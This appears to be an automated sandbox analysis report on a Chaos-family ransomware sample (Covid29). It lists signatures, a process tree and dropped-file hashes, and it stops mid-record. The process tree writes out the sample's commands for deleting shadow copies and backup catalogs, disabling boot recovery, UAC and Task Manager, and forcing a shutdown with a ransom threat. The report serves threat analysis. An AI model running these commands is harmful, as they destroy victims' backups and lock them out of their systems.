Resubmissions

27-01-2025 17:30

250127-v3g6tayrhw 10

27-01-2025 17:27

250127-v1rx8szmhj 4

Analysis

  • max time kernel
    150s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27-01-2025 17:30

General

  • Target

    pankoza2-pl

  • Size

    268KB

  • MD5

    eae2f7fa0188d68918391351145af281

  • SHA1

    d8e2eaf79e5bf54ba6af0c2ada3209636f207d8b

  • SHA256

    1c9ddbb84b77f758948ddf9b1c744cdf3739c19f959ccb2dea2b93080136f797

  • SHA512

    882257c27ab8917f6f7864d9a570bf5071fc999b9bb1528b3aac59dff7daae4986071a6ccef1ba391dd7ee9f056a0f155e8c579f36d108ed33c8af2bf1c0f3ba

  • SSDEEP

    6144:5jBRhpOL/saqkPV9FH2LtcIDSsmwd9KvZJT3CqbMrhryf65NRPaCieMjAkvCJv1q:9BRhpOL/saqkPV9FH2LtcIDSsmwd9KvR

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 3 IoCs
  • Chaos family
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 34 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 26 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\pankoza2-pl
    1⤵
      PID:2160
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe"
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2672 CREDAT:275457 /prefetch:2
        2⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2744
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        2⤵
        • Checks processor information in registry
        • Modifies registry class
        • NTFS ADS
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.0.1877021233\1605366692" -parentBuildID 20221007134813 -prefsHandle 1232 -prefMapHandle 1116 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ccbe915-1b28-47d0-aa87-046ebb2a2d8c} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 1368 109f8f58 gpu
          3⤵
            PID:640
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.1.1852621345\877456475" -parentBuildID 20221007134813 -prefsHandle 1504 -prefMapHandle 1492 -prefsLen 20928 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2f02a92-1572-4731-b2cd-4c044427a82b} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 1516 d71c58 socket
            3⤵
              PID:688
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.2.2040088686\2070677561" -childID 1 -isForBrowser -prefsHandle 1968 -prefMapHandle 1928 -prefsLen 20966 -prefMapSize 233444 -jsInitHandle 756 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b87022b4-a239-43f5-88ba-d01585e7753b} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 1980 1a66b858 tab
              3⤵
                PID:1288
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.3.1322567169\229247950" -childID 2 -isForBrowser -prefsHandle 2584 -prefMapHandle 2580 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 756 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6ecc6dc-718e-4f80-b2f6-de83fd0a1142} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 2596 1c912258 tab
                3⤵
                  PID:1988
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.4.324764799\1318298356" -childID 3 -isForBrowser -prefsHandle 2904 -prefMapHandle 2900 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 756 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9646c3e8-88a7-4180-be00-5a9928d7e5c0} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 2916 1d050458 tab
                  3⤵
                    PID:2508
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.5.1604683866\37713728" -childID 4 -isForBrowser -prefsHandle 3492 -prefMapHandle 3424 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 756 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba82c820-c191-4acd-8aae-5687681cb32f} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 3900 1eca7958 tab
                    3⤵
                      PID:2544
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.6.1126746368\1189309311" -childID 5 -isForBrowser -prefsHandle 3964 -prefMapHandle 3968 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 756 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {08a72ae6-10c6-4cc9-8542-7b047702c24e} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 3952 213f7558 tab
                      3⤵
                        PID:2836
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.7.125494800\1705137582" -childID 6 -isForBrowser -prefsHandle 4132 -prefMapHandle 4136 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 756 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {170c4757-bf9f-49ad-b63c-c4ffaa59d9b1} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 4120 213f8d58 tab
                        3⤵
                          PID:2440
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.8.1141099073\143343421" -childID 7 -isForBrowser -prefsHandle 4296 -prefMapHandle 4288 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 756 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e96be97-9338-4b9a-9d3a-50dbcf55a5dd} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 4208 1075c058 tab
                          3⤵
                            PID:1636
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2644.9.1351306891\101713138" -childID 8 -isForBrowser -prefsHandle 3160 -prefMapHandle 3164 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 756 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f9c2a785-4bf6-423c-a796-ea3fff93c3e6} 2644 "\\.\pipe\gecko-crash-server-pipe.2644" 3152 1ea99958 tab
                            3⤵
                              PID:2564
                        • C:\Program Files\7-Zip\7zG.exe
                          "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2:98:7zEvent29211
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          PID:2820
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x530
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3296
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\source\TrojanRansomCovid29.bat"
                          1⤵
                            PID:3616
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\source\fakeerror.vbs"
                              2⤵
                                PID:3740
                              • C:\Windows\system32\PING.EXE
                                ping localhost -n 2
                                2⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:3752
                              • C:\Windows\system32\reg.exe
                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                2⤵
                                • Modifies registry key
                                PID:3804
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                2⤵
                                • Modifies registry key
                                PID:3812
                              • C:\Windows\system32\reg.exe
                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                2⤵
                                • Modifies registry key
                                PID:3824
                              • C:\Windows\system32\reg.exe
                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                2⤵
                                • Modifies registry key
                                PID:3832
                              • C:\Windows\system32\reg.exe
                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                2⤵
                                • Modifies registry key
                                PID:3840
                              • C:\Windows\system32\reg.exe
                                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                2⤵
                                • UAC bypass
                                • Modifies registry key
                                PID:3848
                              • C:\Windows\system32\reg.exe
                                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                2⤵
                                • UAC bypass
                                • Modifies registry key
                                PID:3856
                              • C:\Users\Admin\Downloads\source\mbr.exe
                                mbr.exe
                                2⤵
                                • Executes dropped EXE
                                • Writes to the Master Boot Record (MBR)
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:3876
                              • C:\Users\Admin\Downloads\source\Cov29Cry.exe
                                Cov29Cry.exe
                                2⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3916
                                • C:\Users\Admin\AppData\Roaming\svchost.exe
                                  "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                  3⤵
                                  • Drops startup file
                                  • Executes dropped EXE
                                  • Drops desktop.ini file(s)
                                  • Sets desktop wallpaper using registry
                                  • Suspicious behavior: AddClipboardFormatListener
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4040
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                    4⤵
                                      PID:3356
                                      • C:\Windows\system32\vssadmin.exe
                                        vssadmin delete shadows /all /quiet
                                        5⤵
                                        • Interacts with shadow copies
                                        PID:3380
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic shadowcopy delete
                                        5⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3428
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                      4⤵
                                        PID:3660
                                        • C:\Windows\system32\bcdedit.exe
                                          bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                          5⤵
                                          • Modifies boot configuration data using bcdedit
                                          PID:3684
                                        • C:\Windows\system32\bcdedit.exe
                                          bcdedit /set {default} recoveryenabled no
                                          5⤵
                                          • Modifies boot configuration data using bcdedit
                                          PID:3692
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                        4⤵
                                          PID:3712
                                          • C:\Windows\system32\wbadmin.exe
                                            wbadmin delete catalog -quiet
                                            5⤵
                                            • Deletes backup catalog
                                            PID:3652
                                        • C:\Windows\system32\NOTEPAD.EXE
                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                          4⤵
                                            PID:4028
                                      • C:\Windows\system32\shutdown.exe
                                        shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                        2⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3932
                                      • C:\Windows\system32\PING.EXE
                                        ping localhost -n 9
                                        2⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:3976
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill /f /im explorer.exe
                                        2⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3740
                                      • C:\Users\Admin\Downloads\source\Cov29LockScreen.exe
                                        Cov29LockScreen.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3076
                                    • C:\Windows\system32\vssvc.exe
                                      C:\Windows\system32\vssvc.exe
                                      1⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3260
                                    • C:\Windows\system32\wbengine.exe
                                      "C:\Windows\system32\wbengine.exe"
                                      1⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3816
                                    • C:\Windows\System32\vdsldr.exe
                                      C:\Windows\System32\vdsldr.exe -Embedding
                                      1⤵
                                        PID:3852
                                      • C:\Windows\System32\vds.exe
                                        C:\Windows\System32\vds.exe
                                        1⤵
                                          PID:3876

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

                                          Filesize

                                          26KB

                                          MD5

                                          371b728fed6890d60cfe82d78233a19b

                                          SHA1

                                          ec0a42c349499a7f908a82e4ed161eeccf211fa3

                                          SHA256

                                          983ed861604b5cf60fa3495208dd392a67f9f1e0510797cf14dbeff602894fd6

                                          SHA512

                                          904d5c1e4337021a7724e62963bb244d0ce2614c05433bd81cdcb6f43a887f6e9761563f0c3e3af018e905f8b0ac5382f293bc9b5ea9eb35284dd5841e5774c6

                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                          Filesize

                                          15KB

                                          MD5

                                          96c542dec016d9ec1ecc4dddfcbaac66

                                          SHA1

                                          6199f7648bb744efa58acf7b96fee85d938389e4

                                          SHA256

                                          7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                          SHA512

                                          cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                        • C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

                                          Filesize

                                          1.7MB

                                          MD5

                                          272d3e458250acd2ea839eb24b427ce5

                                          SHA1

                                          fae7194da5c969f2d8220ed9250aa1de7bf56609

                                          SHA256

                                          bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                          SHA512

                                          d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\cert9.db

                                          Filesize

                                          224KB

                                          MD5

                                          29b523ab62e440a0f7526d6a52f294fe

                                          SHA1

                                          5c6cffc7cadb2b79e918673dcf32b8abef9a28c1

                                          SHA256

                                          315ee99c50bf270f61dd55d3de1ac25009f418917d6364023913b6bcde0b9f48

                                          SHA512

                                          a1ff3870676150e6bba34e931a8ddfd9430e6dc2e74952339acef498daef8929ed28f546d26bc3eba26ea1a41ecde63009926d23cd704599d28b7f5875cafe00

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

                                          Filesize

                                          2KB

                                          MD5

                                          aa7b9a7b8ee839e284c6fa5590af234d

                                          SHA1

                                          473032f3e4214ef73b1a721cbe4d9f364ba5aeb5

                                          SHA256

                                          097190f2db4c8aa4010ea626105037527c75ad9c0250bdc9ebe58511fe79bea7

                                          SHA512

                                          f3ef8099244bc7b0dd70f64f4402015a17ca9349a4898acd668de2d60a974a03ed21d26b2e5c920e33b913a7f9b275e905dd7f66105d117ed66e2663ef5a61aa

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\61d2f58b-d935-4e13-a6a7-5cb14e69d355

                                          Filesize

                                          745B

                                          MD5

                                          2f8ecfdcecc7aafbd995aef94a0d46c5

                                          SHA1

                                          642991fb53a64ec5c76170dfb1927286fd0f5588

                                          SHA256

                                          5759ac6a17bff478e69ecf81185f5c74ec596ea394a50b3a0b64610a16725218

                                          SHA512

                                          0a09372babf9485e436b6a6bbd04b5cce820ff390cf7f2f0f78105bd67d1fdb8102603f48f65fb83863a697c50dccff964f04d479474e201e31e9a1d3248f964

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\f9396ede-5e82-46e0-aac9-5a5554d6cf3d

                                          Filesize

                                          10KB

                                          MD5

                                          b6ae6c3bc96aab638b9fe1d40da42d89

                                          SHA1

                                          dc15a9ef9ecf6dee2c9f171083dec171c8cc7813

                                          SHA256

                                          c089cc7e460e2ead396a48fd57ed4f96b24a863b7161f5c126d67f5d2f34dae4

                                          SHA512

                                          396c0889225e18046622e88680663fe6322f6b211b6f22cce17f25283e382983bf25f6129cc9606231a35ec7896760221728520b75cc67b81b9cb916487e7a10

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

                                          Filesize

                                          6KB

                                          MD5

                                          2adffbeae181e05e2d83961c0dabd471

                                          SHA1

                                          92e3dea9d6a47ba8a7b56592559bc0af1d6c5878

                                          SHA256

                                          f31c27a3cce621dc57b87b69c36deeb33228514f399ab28702adcf46eba758cd

                                          SHA512

                                          a3328dcf293813d0db975faa4a08ebbff2c420781ee1bbf0cbbcc03954dffa40b2f0aba76c66e33b36d9f158cdfc9d7a6da5f878725afde8b74b655c6db28edd

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

                                          Filesize

                                          6KB

                                          MD5

                                          51f6fb18eec618e36850be78f903d23f

                                          SHA1

                                          71ab2f53ebd8ac270599002325266a4082a7fdf8

                                          SHA256

                                          90f006ebb13d0fe52abcfcce4cad7b4d2c9f4c475c4d5edf74578929751e69ea

                                          SHA512

                                          08aa01def1758ace123fb8015e694d3f09c8a2fcead5df90b17232e0dcd17a949264f6255992b911381d6172454cfd5059895d2c97329e8d5ad1d6c4ffd78750

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

                                          Filesize

                                          6KB

                                          MD5

                                          0a306592951fefd8969da6f4fd099469

                                          SHA1

                                          591162d4379d4f81473bb5ebe1a0158599e07043

                                          SHA256

                                          ed3049a9194a288c3eb09b4bc55053e77c982cae64c10a4d7b4ae3bff701131f

                                          SHA512

                                          85952d73990efbc6dd948a8ed6b9da01ef883d7bc213e7b900a7ed57d4a164b9bc09997be6195771b533c8b7c731406c5a7364f7b674552494349c209cece29d

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionCheckpoints.json

                                          Filesize

                                          90B

                                          MD5

                                          c4ab2ee59ca41b6d6a6ea911f35bdc00

                                          SHA1

                                          5942cd6505fc8a9daba403b082067e1cdefdfbc4

                                          SHA256

                                          00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2

                                          SHA512

                                          71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

                                          Filesize

                                          4KB

                                          MD5

                                          ac50b70f5f1bfedaa1439f4a5948be8e

                                          SHA1

                                          6cd137ef53fac68413110c57e41343f0f8f9de29

                                          SHA256

                                          8c56ecccd2ce612c724e71fab06989156a63b3e19f83956d60e5c3e849573eb0

                                          SHA512

                                          a48255a13d25ae127bf103f012c8a01c6f5d212295f7671b54372ca97449f0eaf25b4d166d5eeef933f90e472ce7e6bd9f78c3360b0b91ed49ea1ed858488d1c

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

                                          Filesize

                                          6KB

                                          MD5

                                          e893a63102a6a49b810ebcd09cadd002

                                          SHA1

                                          82beb6384004fc1e05bc66ccc0e3f32791cc433b

                                          SHA256

                                          960a5ce632a7e6c6f13d4213382bb3ac41da0803d304b91a2be8aa5707d70e3a

                                          SHA512

                                          df698075f6698dc09340be0c038be5573a72e7668ac3d9819dd18b5f64e62495f74808506b3c19cad8c5978d27f25562e70a9e50c451c3ddba11ddea32a9e7a4

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

                                          Filesize

                                          3KB

                                          MD5

                                          bf4154f8733ba0f47288b51aa418201c

                                          SHA1

                                          8aa8b685385710edac83d598b8dcc976d8a8ea49

                                          SHA256

                                          b2eb7d650f6101cccdcabab2bc06694a5f55c2dab703c2c4dd22ebe58cd0d521

                                          SHA512

                                          a638c447f9f1ccd37603ae43fbcb03287fc292bf0efa7eb1afc8a6c8fe410f8d8eb2dde4c796d40acaf133f5fd9fdc86a797f8ac100b3ccfeb41c3c357f9ab8e

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                          Filesize

                                          184KB

                                          MD5

                                          367c65d71698ee08e330271bc49fafe0

                                          SHA1

                                          01411794334d677eef674f2803db8689cb9c65e4

                                          SHA256

                                          740d5eac8e9ca704a4627fe8eb86e5dd8be68a2a5f6fd8fa5ec3bf79306fb03e

                                          SHA512

                                          53bc19f4cc4a2944234c71634b8544f133363802478e5dad4b74cafa45a478ab45f8956f9f0df792aae627ee619355cdefed7685568da617d19fb676e48044b7

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\targeting.snapshot.json

                                          Filesize

                                          4KB

                                          MD5

                                          72d077fb8e2f5af4e5d044deda9731c5

                                          SHA1

                                          27f68987fcef6299fb4f7146bb39eab3bb2dff3d

                                          SHA256

                                          2b2b9e3bb9823ba62169686c047302d9a49297208c239e4f7857ce8811257a63

                                          SHA512

                                          7843df39fcc7b25d5471e634ec36869698132536d22c2b51cd042bfcd38905fc97f1c5a7ae56fbeae2287fd943fa039f47d51c11e8b9050dd1342b8d790f1c6f

                                        • C:\Users\Admin\Desktop\covid29-is-here.txt

                                          Filesize

                                          861B

                                          MD5

                                          c53dee51c26d1d759667c25918d3ed10

                                          SHA1

                                          da194c2de15b232811ba9d43a46194d9729507f0

                                          SHA256

                                          dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                          SHA512

                                          da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                        • C:\Users\Admin\Downloads\readme.txt

                                          Filesize

                                          285B

                                          MD5

                                          f4f557db9c615c87e524802af8a9992f

                                          SHA1

                                          692692c464b2a0229c697534c97d391179c5b646

                                          SHA256

                                          17976e8a6952b0123b729b50b3ad981cbe97083db9de66a37eb6f8decc39b76e

                                          SHA512

                                          7e8b9f2c01edf81252b722e2f9fffd1418150e9c5d6c322645bdc675561bad5b204c93ee5484b464c27a2d56ce86abc00152d32609bfd5f8271c32089b12d4c0

                                        • C:\Users\Admin\Downloads\source\Bat To Exe Converter\settings.ini

                                          Filesize

                                          242B

                                          MD5

                                          d3be6c4edea45f5a9a766dd235e4c23a

                                          SHA1

                                          bc3f164c51e8f9b223b2992688aae2d492a18353

                                          SHA256

                                          236d6136a9ea4241facb7c459bf0bad6d1fa572d436e6e73c44884d6126e5ab4

                                          SHA512

                                          bd2f5cb1316bcc64bbf30b2828d497157129e2013a529be591733a5c900f4d3450e97eed3ba75f057a49884cdb9c0a72dcc2ba5768db33fba7ce9236f5cea6bc

                                        • C:\Users\Admin\Downloads\source\Cov29Cry.exe

                                          Filesize

                                          103KB

                                          MD5

                                          8bcd083e16af6c15e14520d5a0bd7e6a

                                          SHA1

                                          c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                          SHA256

                                          b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                          SHA512

                                          35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                        • C:\Users\Admin\Downloads\source\Cov29Cry\AdvancedOptions.PNG

                                          Filesize

                                          16KB

                                          MD5

                                          c5f0f9ab684461c635f551d045e6caa5

                                          SHA1

                                          d68eabb18c68f34abc7e91b8538c445738c619e1

                                          SHA256

                                          6c9eb2da924df69bcee50c50f51a67c66321eaf1f453e4c864f037d31e08cf93

                                          SHA512

                                          f4ecaac100f6901dc1172fec228f48c5f73d828845dd579059143a0099ca3f5df17789808953b4145d236470acde80811d9c7e89b05dd773e9c2bdcf6142df42

                                        • C:\Users\Admin\Downloads\source\Cov29Cry\FileExtentions.txt

                                          Filesize

                                          1KB

                                          MD5

                                          189eeecf41700ae5ba9ae1a4a1c49e9a

                                          SHA1

                                          79dbd0e112eb3a184643dc4d9b76356c272fbc6b

                                          SHA256

                                          31fd1820ee3f7aad61f1f99e944d2df2c5406f033a661ea98e07c389d6334ba2

                                          SHA512

